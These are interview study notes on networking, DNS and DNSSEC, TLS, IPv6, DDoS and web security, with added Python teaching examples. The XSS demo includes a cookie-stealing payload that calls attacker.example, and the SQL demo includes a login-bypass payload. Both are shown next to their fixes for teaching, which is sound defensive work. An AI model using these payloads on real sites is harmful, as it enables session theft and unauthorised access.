Notes for some interview questions.
Data link layer. Switches work at this layer, so MAC addresses and node-to-node (hop-to-hop) frame delivery all happen here.
Network layer. IP and ICMP live at this layer. IP addressing, routers, and routing from one network to another happen here.
Transport layer. TCP/UDP live at this layer. It provides end-to-end delivery between ports: segmentation, and for TCP also reliability, ordering and flow/congestion control (the "speed" of the connection).
Session layer. SSL/TLS is usually placed at this layer (strictly it sits between transport and application).
Presentation layer. Data representation and encoding, e.g. character sets, PNG/JPEG image encoding, compression.
Application layer. The layer we interact with every day: HTTP, FTP, SSH are here.
Just remember 'All People Seem To Need Data Processing': the first letters give the layer order from the top (Application) down to the bottom (Physical).
A: which IPv4 address(es) a domain name points to (AAAA is the IPv6 equivalent).
CNAME: a domain name that is an alias for another domain name.
PTR: reverse record for an IP address, finds which domain name is registered for this IP.
DNSKEY: the zone's public keys (KSK and ZSK), used to verify RRSIGs. Signatures are verified with the public key, not "decrypted".
RRSIG: the digital signature over a DNS record set. Verify it with the zone's DNSKEY; if verification fails the records have been modified (or the signature has expired).
DS: a hash (digest) of the child zone's KSK DNSKEY, published in the parent zone and signed by the parent's key (the DS itself is not a signature). A validating resolver verifies the parent's RRSIG over the DS with the parent's DNSKEY, then checks that the DNSKEY returned by the child zone hashes to the DS; that is the chain of trust from the root trust anchor down to the record.
Authoritative DNS: holds the actual DNS records for the domain.
Recursive resolver: does not hold the records itself; it asks authoritative servers on the client's behalf and caches the answers. The resolution path is: client -> recursive resolver -> root server (.) -> TLD server (.com) -> authoritative server for the domain.
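A worked example of the DS check described in the DNSKEY/RRSIG/DS notes above, added here and not part of the original notes: it builds the DNSKEY RDATA for a constructed KSK of example.com., computes the DS digest (SHA-256 over the owner name in wire format plus the DNSKEY RDATA, RFC 4034 section 5.1.4) and the key tag (RFC 4034 Appendix B), and shows that a tampered DNSKEY no longer matches the DS the parent published. The key bytes are made up (a real ECDSA P-256 public key has the same 64-byte length); verifying the parent's RRSIG over the DS record needs a signature library and is not shown.

```python
import hashlib
import hmac


def name_to_wire(name: str) -> bytes:
    """Canonical wire format of an owner name: lowercase, length-prefixed labels, root = 0x00."""
    name = name.rstrip(".").lower()
    labels = name.split(".") if name else []
    return b"".join(bytes([len(label)]) + label.encode("ascii") for label in labels) + b"\x00"


def dnskey_rdata(flags: int, protocol: int, algorithm: int, pubkey: bytes) -> bytes:
    """DNSKEY RDATA = Flags(2) | Protocol(1) | Algorithm(1) | Public Key."""
    return flags.to_bytes(2, "big") + bytes([protocol, algorithm]) + pubkey


def key_tag(rdata: bytes) -> int:
    """RFC 4034 Appendix B key tag (valid for every algorithm except the obsolete RSA/MD5)."""
    ac = 0
    for i, byte in enumerate(rdata):
        ac += byte if i & 1 else byte << 8
    ac += (ac >> 16) & 0xFFFF
    return ac & 0xFFFF


# DS digest types: 1 = SHA-1 (deprecated), 2 = SHA-256, 4 = SHA-384.
DIGESTS = {1: hashlib.sha1, 2: hashlib.sha256, 4: hashlib.sha384}


def ds_digest(owner: str, rdata: bytes, digest_type: int = 2) -> str:
    """DS digest = hash(owner name in wire format | DNSKEY RDATA), hex-encoded."""
    return DIGESTS[digest_type](name_to_wire(owner) + rdata).hexdigest()


def ksk_matches_ds(owner: str, rdata: bytes, published_ds_hex: str, digest_type: int = 2) -> bool:
    """The check a validating resolver does: does the child's DNSKEY hash to the parent's DS?"""
    return hmac.compare_digest(ds_digest(owner, rdata, digest_type), published_ds_hex.lower())


# Constructed KSK: flags 257 (ZONE + SEP bit), protocol 3, algorithm 13 (ECDSAP256SHA256),
# 64 placeholder key bytes. Not a real key.
OWNER = "example.com."
KSK_RDATA = dnskey_rdata(257, 3, 13, bytes(range(64)))

# What the parent zone (.com) would publish as the DS record for this KSK (digest type 2).
PUBLISHED_DS = ds_digest(OWNER, KSK_RDATA)


def tampered_ksk() -> bytes:
    """The same DNSKEY with one key byte flipped, as a forged DNSKEY answer would look."""
    rdata = bytearray(KSK_RDATA)
    rdata[-1] ^= 0x01
    return bytes(rdata)


if __name__ == "__main__":
    # Presentation-format DS: key tag, algorithm, digest type, digest
    print("DS record:", key_tag(KSK_RDATA), 13, 2, PUBLISHED_DS)
    print("genuine DNSKEY matches DS:", ksk_matches_ds(OWNER, KSK_RDATA, PUBLISHED_DS))
    print("tampered DNSKEY matches DS:", ksk_matches_ds(OWNER, tampered_ksk(), PUBLISHED_DS))
```

The owner name is part of the digest input, so a DS for example.com. cannot be reused to vouch for the same key under another name; the comparison uses hmac.compare_digest out of habit, although DS digests are public values.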
unicast: one node to one node.
multicast: one node to a group of nodes at the same time.
broadcast: one node to all nodes on the segment.
anycast: the same IP address is announced from multiple nodes, but each packet is delivered to only one of them; routing decides which server a client reaches (normally the topologically nearest). An anycast IP is deployed by announcing the same prefix with Border Gateway Protocol (BGP) from several locations or Autonomous Systems (AS).
ping: sends ICMP Echo Request packets to determine whether the destination host is alive, and measures the round-trip time.
traceroute: prints the route to the destination and the reachability/latency of each hop; classic Unix traceroute sends UDP probes by default (Windows tracert uses ICMP echo).
MTR: combines ping and traceroute, continuously sends ICMP echo packets to every hop and reports loss and latency per hop; it can be set to use UDP or TCP instead.
How do we know what each hop is? The TTL trick: probes are sent with TTL = 1, 2, 3, ...; each router decrements the TTL, and the router where it reaches zero sends back an ICMP Time Exceeded message, which reveals that router's IP address and the response time. But some routers rate-limit or simply drop the TTL-exceeded response, so a hop may show up as "* * *".
TLS uses both a symmetric algorithm and asymmetric encryption: the asymmetric part (the server's certificate and public key) is used to set up a shared session secret, and the fast symmetric cipher encrypts the bulk data with it.
Session resumption: the client can reuse a previous session secret (via a session ID or session ticket) to reconnect to the server without a full handshake.
ClientHello: supported SSL/TLS versions, cipher suites, random number 1.
ServerHello: the chosen TLS version and cipher suite, random number 2, followed by the server certificate.
The client checks the certificate against the root CA public keys shipped with the browser or OS: it verifies the signature chain up to a trusted root and checks the validity period, the hostname and revocation. A broken signature means the certificate was modified; an expired or wrong-name certificate is invalid.
The client generates random number 3 (the pre-master secret), encrypts it with the server's public key from the certificate and sends it; both sides then derive the session secret from random numbers 1-3.
The server decrypts the pre-master secret with its private key, derives the same session secret, and from then on both sides encrypt data with that symmetric key. This is the RSA key exchange of TLS 1.2 and earlier; TLS 1.3 uses ephemeral Diffie-Hellman instead, so the secret is never transmitted and a later leak of the server key cannot decrypt recorded traffic.
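A worked example of the session-secret derivation in the handshake above, added here and not part of the original notes. It implements the TLS 1.2 PRF (RFC 5246 section 5, P_SHA256) and derives the 48-byte master secret from the three random values: random 1 (ClientHello), random 2 (ServerHello) and random 3 (the 48-byte pre-master secret). The RSA encryption of the pre-master secret under the server's certificate key is not shown because it needs an RSA library; the example assumes the server has already decrypted it, and also shows that replaying the same pre-master secret against a fresh ServerHello random yields a different key.

```python
import hashlib
import hmac
import os


def p_sha256(secret: bytes, seed: bytes, length: int) -> bytes:
    """P_SHA256 data expansion from RFC 5246 section 5:
    A(0) = seed, A(i) = HMAC(secret, A(i-1)), output = HMAC(secret, A(1)+seed) | HMAC(secret, A(2)+seed) | ..."""
    out = b""
    a = seed
    while len(out) < length:
        a = hmac.new(secret, a, hashlib.sha256).digest()
        out += hmac.new(secret, a + seed, hashlib.sha256).digest()
    return out[:length]


def tls12_prf(secret: bytes, label: bytes, seed: bytes, length: int) -> bytes:
    """TLS 1.2 PRF: P_SHA256(secret, label + seed) for SHA-256 based cipher suites."""
    return p_sha256(secret, label + seed, length)


def derive_master_secret(pre_master: bytes, client_random: bytes, server_random: bytes) -> bytes:
    """RFC 5246 section 8.1: master_secret = PRF(pre_master_secret, "master secret",
    ClientHello.random + ServerHello.random)[0..47]."""
    return tls12_prf(pre_master, b"master secret", client_random + server_random, 48)


def rsa_handshake_demo() -> tuple[bytes, bytes, bytes]:
    """Both sides derive the session secret from random numbers 1-3.
    Returns (client master secret, server master secret, master secret of a replayed exchange)."""
    client_random = os.urandom(32)   # random number 1, sent in ClientHello
    server_random = os.urandom(32)   # random number 2, sent in ServerHello
    # random number 3: pre-master secret = client_version (TLS 1.2 = 0x0303) + 46 random bytes.
    pre_master = b"\x03\x03" + os.urandom(46)
    # Client encrypts pre_master under the server's RSA public key; server decrypts it with
    # its private key (not shown here). Afterwards both hold the same three values.
    client_ms = derive_master_secret(pre_master, client_random, server_random)
    server_ms = derive_master_secret(pre_master, client_random, server_random)
    # An attacker replaying the recorded ClientKeyExchange against a new ServerHello gets a
    # different key, because the server's fresh random is mixed into the derivation.
    replay_ms = derive_master_secret(pre_master, client_random, os.urandom(32))
    return client_ms, server_ms, replay_ms


if __name__ == "__main__":
    client_ms, server_ms, replay_ms = rsa_handshake_demo()
    print("client == server:", client_ms == server_ms)
    print("replay  == server:", replay_ms == server_ms)
```

The master secret is then expanded again with the PRF (label "key expansion") into the symmetric encryption and MAC keys for each direction; the two randoms guarantee that even the same pre-master secret never produces the same session keys twice.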
SSL was first developed by Netscape, initially just for HTTP connections: SSLv2, SSLv3 (both are now deprecated and broken).
TLS is the open IETF standard successor, designed to be application independent: TLS 1.2, 1.3 (TLS 1.0 and 1.1 are deprecated).
DoT: DNS over TLS, like HTTP over TLS, on port 853.
DoH: DNS over HTTPS, on port 443, so it looks like ordinary web traffic.
ipv4: 4 octets (groups) x 8 bits each = 32 bits, normally written in decimal, e.g. 192.0.2.1.
ipv6: 8 groups x 4 hexadecimal characters x 4 bits per hex character = 128 bits.
':' is named as colon in English.
link local: `FE80::/10`, like 169.254.0.0/16 in IPv4, not routed at all (only valid on the local link).
unique local: `FC00::/7` (FC00:: - FDFF::, in practice FD00::/8 is used), like the RFC 1918 private ranges 10.x, 172.16.x, 192.168.x; not routed on the internet.
global unicast: public addresses, `2000::/3`, routed on the internet.
`FF00::/8`: multicast addresses. IPv6 has no broadcast; e.g. FF02::1 (all nodes on the link) takes its place.
`::1/128`: loopback, the equivalent of 127.0.0.1.
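An added example (not from the original notes) that puts the ranges above into code with Python's ipaddress module: it classifies an IPv4 or IPv6 address by the prefixes listed (global unicast being 2000::/3), reports whether the address should be routable on the internet, and shows the 32/128-bit widths and the 8 x 4 hex digit expansion of a compressed IPv6 address. The sample addresses in the usage are constructed; 2001:db8::/32 is the IPv6 documentation prefix.

```python
import ipaddress

# IPv6 ranges from the notes, checked in order.
IPV6_SCOPES = [
    ("loopback", ["::1/128"]),
    ("link-local", ["fe80::/10"]),        # like 169.254.0.0/16 in IPv4
    ("unique-local", ["fc00::/7"]),       # FC00:: - FDFF::, like RFC 1918 in IPv4
    ("multicast", ["ff00::/8"]),          # IPv6 has no broadcast
    ("global unicast", ["2000::/3"]),     # public, routed on the internet
]

# IPv4 counterparts. Other reserved IPv4 blocks (e.g. 100.64.0.0/10) are not listed here.
IPV4_SCOPES = [
    ("loopback", ["127.0.0.0/8"]),
    ("link-local", ["169.254.0.0/16"]),
    ("private (RFC 1918)", ["10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"]),
    ("multicast", ["224.0.0.0/4"]),
]

INTERNET_ROUTABLE = {"global unicast", "public"}


def classify(addr: str) -> str:
    """Return the scope name for an IPv4 or IPv6 address string."""
    ip = ipaddress.ip_address(addr)
    table = IPV6_SCOPES if ip.version == 6 else IPV4_SCOPES
    for scope, prefixes in table:
        if any(ip in ipaddress.ip_network(prefix) for prefix in prefixes):
            return scope
    # Anything outside the listed IPv6 blocks is reserved/unassigned; for IPv4 treat it as public.
    return "other/reserved" if ip.version == 6 else "public"


def internet_routable(addr: str) -> bool:
    """Should a router forward this address across the public internet?"""
    return classify(addr) in INTERNET_ROUTABLE


def bit_width(addr: str) -> int:
    """32 for IPv4 (4 octets x 8 bits), 128 for IPv6 (8 groups x 4 hex chars x 4 bits)."""
    return ipaddress.ip_address(addr).max_prefixlen


def expand_ipv6(addr: str) -> str:
    """Undo '::' compression: all 8 groups of 4 hex characters, 7 colons."""
    return ipaddress.IPv6Address(addr).exploded


if __name__ == "__main__":
    for sample in ["fe80::1", "fd12:3456:789a::1", "2001:db8::1", "ff02::1", "::1",
                   "169.254.10.1", "192.168.1.10", "8.8.8.8"]:
        print(f"{sample:>20} {bit_width(sample):>3} bit  {classify(sample):<20} "
              f"routable={internet_routable(sample)}")
    print(expand_ipv6("fe80::1"))
```

Firewall and log-analysis code often needs exactly this check: a source address from fe80::/10 or fc00::/7 arriving from the internet is spoofed or misrouted and can be dropped outright.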
DDoS is distributed denial-of-service.
The attacker gains control of a network of online machines (a botnet) in order to carry out the attack.
The goal is to overflow the capacity (bandwidth, connection table, CPU) of the targeted server or network.
Application layer attack: HTTP flood (many seemingly legitimate requests to expensive endpoints).
Protocol attack: SYN flood (half-open connections exhaust the server's connection table).
Amplification: small requests with the victim's spoofed source IP sent to open DNS or NTP servers, which send much larger responses to the victim.
Mitigations: black hole routing (drop all traffic to the target; the service goes offline but the rest of the network survives),
Web Application Firewall (filter application-layer floods such as HTTP floods),
anycast network diffusion (spread the attack traffic across many data centers).
DNS hijacking: tamper with the DNS results to lead the user to a phishing site.
HTTPS helps, because the phishing host cannot present a valid certificate for the real domain and the browser warns; DNSSEC protects the records themselves.
XSS is cross-site scripting.
When a site lets users upload images or submit forms and then displays that content without encoding it correctly, it may be vulnerable to XSS.
A user can post text that includes a script tag; if the tag isn't escaped correctly, every user viewing the post runs the attacker-hosted script, which can lead to many problems, such as stealing the user's session or login credentials, or monitoring the user.
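An added example (not from the original notes) of the unescaped rendering described above next to its fixed form, using Python's html.escape. It also shows the caveat a reviewer looks for: escaping only <, > and & is enough in element text but not inside an attribute, where an unescaped quote lets the input break out and add an event-handler attribute. Both attacker inputs are constructed, and attacker.example is a placeholder host.

```python
import html

# Constructed attacker inputs: a stored comment, and a user-supplied image title.
SCRIPT_PAYLOAD = '<script src="https://attacker.example/steal.js"></script>'
ATTR_PAYLOAD = 'cat" onerror="fetch(`//attacker.example/?c=`+document.cookie)'


def render_comment_unsafe(comment: str) -> str:
    """Vulnerable: user text is dropped straight into the HTML body."""
    return f"<p>{comment}</p>"


def render_comment_safe(comment: str) -> str:
    """Fixed: encode <, >, & (and quotes) so the browser treats the input as text, not markup."""
    return f"<p>{html.escape(comment)}</p>"


def render_title_half_fixed(title: str) -> str:
    """Still vulnerable: quote=False leaves quotes alone, so input can close the attribute
    and add its own (here an onerror handler that exfiltrates document.cookie)."""
    return f'<img src="cat.png" title="{html.escape(title, quote=False)}">'


def render_title_safe(title: str) -> str:
    """Attribute context: quote=True (the default) also encodes double and single quotes,
    so the input stays inside the title attribute."""
    return f'<img src="cat.png" title="{html.escape(title, quote=True)}">'


def has_injected_attribute(markup: str) -> bool:
    """Crude detector used for the demo: did a user-controlled onerror attribute appear?"""
    return '" onerror="' in markup


if __name__ == "__main__":
    print(render_comment_unsafe(SCRIPT_PAYLOAD))
    print(render_comment_safe(SCRIPT_PAYLOAD))
    print(render_title_half_fixed(ATTR_PAYLOAD), "<- attribute broken out of")
    print(render_title_safe(ATTR_PAYLOAD))
```

Escaping has to match the output context (element text, attribute, JavaScript string, URL), which is why a template engine with auto-escaping is preferred over hand-built strings; marking the session cookie HttpOnly and setting a Content-Security-Policy limit the damage when an escape is missed.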
When a developer uses user input to build a SQL string that is run against the database, without handling it correctly, there may be a SQL injection: the attacker submits a string that changes the meaning of the query.
Always use prepared (parameterized) statements so that input is passed as data, never as query text; quoting or escaping the input by hand is only a fallback and is easy to get wrong.
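A worked example of the SQL injection above, added here and not part of the original notes. It uses an in-memory SQLite database with a constructed users table and shows three versions of a login query: the string-built one, which the payload `alice' --` turns into a query with the password check commented out; a hand-quoted one that happens to survive this payload but is the fragile fallback; and the parameterized one, where the payload is just a username that does not exist. Passwords are stored in plaintext only to keep the demo short.

```python
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Constructed sample data: one user. Real systems store a password hash, not the password."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list[str]:
    """User input becomes part of the SQL text, so it can change the query's meaning."""
    sql = (f"SELECT username FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return [row[0] for row in conn.execute(sql)]


def login_hand_quoted(conn: sqlite3.Connection, username: str, password: str) -> list[str]:
    """Fallback: double every single quote. Blocks this payload, but must be applied to every
    input in every query and offers nothing for numeric contexts or identifiers."""
    q = lambda s: s.replace("'", "''")
    sql = (f"SELECT username FROM users "
           f"WHERE username = '{q(username)}' AND password = '{q(password)}'")
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list[str]:
    """Prepared statement: the query text is fixed, inputs travel as bound parameters."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


# Constructed attack: close the string, then comment out the rest of the WHERE clause.
# The vulnerable query becomes: ... WHERE username = 'alice' --' AND password = 'wrong'
PAYLOAD_USERNAME = "alice' --"


if __name__ == "__main__":
    conn = setup_db()
    print("vulnerable:", login_vulnerable(conn, PAYLOAD_USERNAME, "wrong"))
    print("hand-quoted:", login_hand_quoted(conn, PAYLOAD_USERNAME, "wrong"))
    print("parameterized:", login_safe(conn, PAYLOAD_USERNAME, "wrong"))
    print("legitimate:", login_safe(conn, "alice", "correct horse"))
```

The same payload shape works against any database whose SQL dialect supports `--` comments; other classic variants (`' OR '1'='1`, stacked statements, UNION SELECT) all rely on the input being parsed as SQL, which parameter binding rules out.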
Agentless: no daemons to run and no database needed, very minimal installation requirements.
It connects to a server using SSH (or WS-Man/WinRM for Windows), copies the Python code over, executes it and then removes it again.
Use HTTP/2: gain the performance HTTP/2 provides by multiplexing many requests over one connection per domain instead of opening multiple connections, which reduces connection overhead.
Lazy-load images, reduce image quality, use PNG or WebP.
Set correct cache headers so the browser cache is used.
Use anycast to absorb DDoS attacks and to send users to the nearest data center.
Use a CDN or a cache layer in the web deployment.
Serve CSS/JS from a separate (cookie-less) domain from the data API to shrink request headers, save bandwidth, and raise the per-domain connection limit (this matters mostly for HTTP/1.1).
Use icon fonts to replace icon images, and merge small images into one sprite to reduce the number of requests.